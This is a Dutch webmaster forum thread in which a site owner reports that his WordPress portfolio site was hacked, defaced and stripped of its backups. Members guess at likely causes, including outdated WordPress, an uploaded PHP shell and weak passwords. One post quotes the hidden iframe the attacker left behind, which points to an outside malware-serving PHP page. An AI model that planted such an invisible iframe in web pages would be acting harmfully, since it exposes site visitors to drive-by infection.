Vandaag kwam ik er achter dat mijn portfolio website gehacked is. Ik begrijp niet hoe dit kon gebeuren. Wellicht zijn hier mensen die weten of er een lek o.i.d. aanwezig is.
Hetgeen wat onze misgunner achtergelaten heeft:
hacked by
Ik kan nog wel inloggen in de directadmin. Helaas was hier alles verwijderd, zelfs de backups. Wat bezielt die hackers in godsnaam? Ik begrijp echt niet waar het voor nodig is.
Iemand tips hoe alles terug te krijgen en alles beter te beschermen o.i.d.?
Luuk
- Site gehackt
-
22-06-2011, 15:33 #1
- Berichten
- 92
- Lid sinds
- 17 Jaar
Site gehackt
Laatst aangepast door Luuk G. : 22-06-2011 om 20:31
-
-
22-06-2011, 15:34 #2
- Berichten
- 2.202
- Lid sinds
- 16 Jaar
Re: Site gehackt
Waarschijnlijk is dit gekomen door het niet of te laat updaten van wordpress, aangezien ik via google cache kan zien dat er wordpress was gebruikt.
-
22-06-2011, 15:36 #3
- Berichten
- 296
- Lid sinds
- 15 Jaar
Re: Site gehackt
Virusscanner slaat op hol als ik de site bezoek. Stond er een CMS (Content Management System) op de site?
-
22-06-2011, 15:37 #4
- Berichten
- 94
- Lid sinds
- 14 Jaar
Re: Site gehackt
Maar backups uit DA verwijderen kan toch alleen door in te loggen op DA? Misschien een zwak wachtwoord?
-
22-06-2011, 15:39 #5
- Berichten
- 92
- Lid sinds
- 17 Jaar
Re: Site gehackt
Naar mijn weten heb ik dit altijd netjes bijgehouden. Maar het zou dus kunnen komen omdat ik toevallig 1 versie achter liep?
Het wachtwoord bestond overigens uit cijfers en letters, niet gemakkelijk dus.
-
22-06-2011, 15:43 #6
- Berichten
- 1.406
- Lid sinds
- 17 Jaar
Re: Site gehackt
Waar had je je hosting gekocht? hebben hun misschien geen backup voor je?
-
22-06-2011, 15:43 #7
- Berichten
- 226
- Lid sinds
- 15 Jaar
Re: Site gehackt
Check even de login history van je DirectAdmin.
-
22-06-2011, 15:44 #8
- Berichten
- 620
- Lid sinds
- 15 Jaar
Re: Site gehackt
Er zijn verschillende methodes om binnen te dringen in een website. Informatie: http://nl.wikipedia.org/wiki/SQL_injection
http://nl.wikipedia.org/wiki/Cross-site_scripting
Er is een persoon hier op sitedeals die daar veel van af weet. Ik ben even de naam vergeten. Wellicht kan hij je helpen om je website veilig te maken.
-
22-06-2011, 15:45 #9
- Berichten
- 630
- Lid sinds
- 16 Jaar
Re: Site gehackt
ja maar met wordpress mag je toch verwachten dat dit veilig is ?
-
22-06-2011, 15:47 #10
- Berichten
- 2.202
- Lid sinds
- 16 Jaar
Re: Site gehackt
@Matthijs, dat klopt. Maar wordpress word nog altijd gemaakt door mensen en kunnen fouten in zitten.
Robin
-
22-06-2011, 15:56 #11
- Berichten
- 690
- Lid sinds
- 15 Jaar
Re: Site gehackt
wordpress is opensource en dat betekend dat iedereen de broncode kan zien.
Het word veel gebruikt dus is het HEEL aantrekkelijk om lekken erin te misbruiken.
http://www.google.com.au/search?as_q...=Google+zoeken
Als je dan eenmaal een lek vind in wordpress heb je duizende websites die je kunt kraken.
Daarom ben ik geen voorstander van opensource CMS's
-
22-06-2011, 16:10 #12
- Berichten
- 92
- Lid sinds
- 17 Jaar
Re: Site gehackt
De login history in de directadmin heb ik ook bekeken, maar geen andere ip's te bekennen. Kan je die verwijderen of?
Aanvullend bericht:
In het .html bestand wat hij had achtergelaten zat overigens nog wel dit (Link niet aanklikken, kan een virus zijn):
<iframe src="http://rerreas.in/sss/abominableabolition.php" style="visibility: hidden; display: none; width: 0px; height: 0px;"></iframe>
Een virus of iets dergelijks, iemand die weet wat het precies is?. Maar is er op één of andere manier niet te achterhalen wie het gedaan heeft?Laatst aangepast door Luuk G. : 22-06-2011 om 16:43 Reden: Automatisch samengevoegd.
-
22-06-2011, 18:47 #13
- Berichten
- 158
- Lid sinds
- 14 Jaar
Re: Site gehackt
misschien is het dus niet via de directadmin gebeurt, maar via de ftp.
het is mogelijk dat mensen dan pagina's maken met daarin query's om gegevens uit DA te verwijderen
-
22-06-2011, 19:20 #14
- Berichten
- 620
- Lid sinds
- 15 Jaar
Re: Site gehackt
Dat gebeurd trouwens met een shell. Dat is een simpele php file waarmee ftp toegang verkregen kan worden. Heb je misschien een plugin of zoiets gedownload waarmee bezoekers bestanden kunnen uploaden op de website?
-
22-06-2011, 19:24 #15
- Berichten
- 599
- Lid sinds
- 16 Jaar
Re: Site gehackt
Men heeft ook helemaal geen toegang tot DirectAdmin of FTP gekregen, waarschijnlijk gewoon de wordpress installatie een tijd niet geupgrade, waardoor er door een exploit toegang tot het filesystem is verkregen. Dan kun je ook gewoon de user backup directory in en leuk de backupjes verwijderen.
Plaats een
- + Advertentie
- + Onderwerp
Marktplaats
Webmasterforum
- Websites algemeen
- Sitechecks
- Marketing
- Domeinen algemeen
- Waardebepaling
- CMS
- Wordpress
- Joomla
- Magento
- Google algemeen
- SEO
- Analytics
- Adsense
- Adwords
- HTML / XHTML
- CSS
- Programmeren
- PHP
- Javascript
- JQuery
- MySQL
- Ondernemen algemeen
- Belastingen
- Juridisch
- Grafisch ontwerp
- Hosting Algemeen
- Hardware Info
- Offtopic